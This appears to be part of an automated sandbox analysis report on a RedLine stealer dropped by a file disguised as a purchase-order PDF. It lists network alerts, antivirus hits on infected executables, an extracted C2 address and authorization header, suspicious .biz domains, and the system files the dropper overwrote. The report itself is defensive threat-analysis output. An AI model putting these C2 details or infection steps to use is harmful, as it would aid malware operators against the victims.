2024-10-10T10:07:42.974911+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.311317+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.636681+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.811614+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:47.045742+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.178596+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.606672+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.611756+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:50.217086+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:51.539038+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:52.850906+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:55.012884+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:57.473457+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:00.032542+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:03.371412+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:05.405349+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:34.594611+0200 | 2046056 | 1 | A Network Trojan was detected | 212.162.149.53 | 2049 | 192.168.2.5 | 49706 | TCP
2024-10-10T10:07:27.497755+0200 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:26.609785+0200 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 18.141.10.107 | 80 | TCP
2024-10-10T10:08:28.098339+0200 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50022 | 34.211.97.45 | 80 | TCP


                            AV Detection

                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Avira: detection malicious, Label: W32/Infector.Gen
                            Source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                            Source: uaafd.biz | Virustotal: Detection: 10%
                            Source: vjaxhpbji.biz | Virustotal: Detection: 11%
                            Source: pywolwnvd.biz | Virustotal: Detection: 12%
                            Source: vrrazpdh.biz | Virustotal: Detection: 10%
                            Source: xlfhhhm.biz | Virustotal: Detection: 14%
                            Source: ctdtgwag.biz | Virustotal: Detection: 10%
                            Source: tbjrpv.biz | Virustotal: Detection: 12%
                            Source: hehckyov.biz | Virustotal: Detection: 11%
                            Source: warkcdu.biz | Virustotal: Detection: 10%
                            Source: lrxdmhrr.biz | Virustotal: Detection: 13%
                            Source: ytctnunms.biz | Virustotal: Detection: 11%
                            Source: przvgke.biz | Virustotal: Detection: 14%
                            Source: npukfztj.biz | Virustotal: Detection: 12%
                            Source: dwrqljrr.biz | Virustotal: Detection: 12%
                            Source: sxmiywsfv.biz | Virustotal: Detection: 13%
                            Source: ecxbwt.biz | Virustotal: Detection: 9%
                            Source: bghjpy.biz | Virustotal: Detection: 12%
                            Source: damcprvgv.biz | Virustotal: Detection: 11%
                            Source: gytujflc.biz | Virustotal: Detection: 14%
                            Source: gvijgjwkh.biz | Virustotal: Detection: 12%
                            Source: deoci.biz | Virustotal: Detection: 13%
                            Source: gnqgo.biz | Virustotal: Detection: 9%
                            Source: ocsvqjg.biz | Virustotal: Detection: 12%
                            Source: cvgrf.biz | Virustotal: Detection: 12%
                            Source: wllvnzb.biz | Virustotal: Detection: 12%
                            Source: lpuegx.biz | Virustotal: Detection: 12%
                            Source: iuzpxe.biz | Virustotal: Detection: 12%
                            Source: bumxkqgxu.biz | Virustotal: Detection: 10%
                            Source: vyome.biz | Virustotal: Detection: 10%
                            Source: yhqqc.biz | Virustotal: Detection: 10%
                            Source: reczwga.biz | Virustotal: Detection: 9%
                            Source: nqwjmb.biz | Virustotal: Detection: 12%
                            Source: xccjj.biz | Virustotal: Detection: 11%
                            Source: dlynankz.biz | Virustotal: Detection: 12%
                            Source: vcddkls.biz | Virustotal: Detection: 12%
                            Source: gcedd.biz | Virustotal: Detection: 9%
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | ReversingLabs: Detection: 31%
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Virustotal: Detection: 34%
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Joe Sandbox ML: detected
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Joe Sandbox ML: detected
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000004.00000003.2117161798.0000000005820000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdb source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdb source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: _.pdb source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdb source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdb source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2787951511.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000005.00000003.2767066626.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdbGCTL source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdb source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

                            Spreading

                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
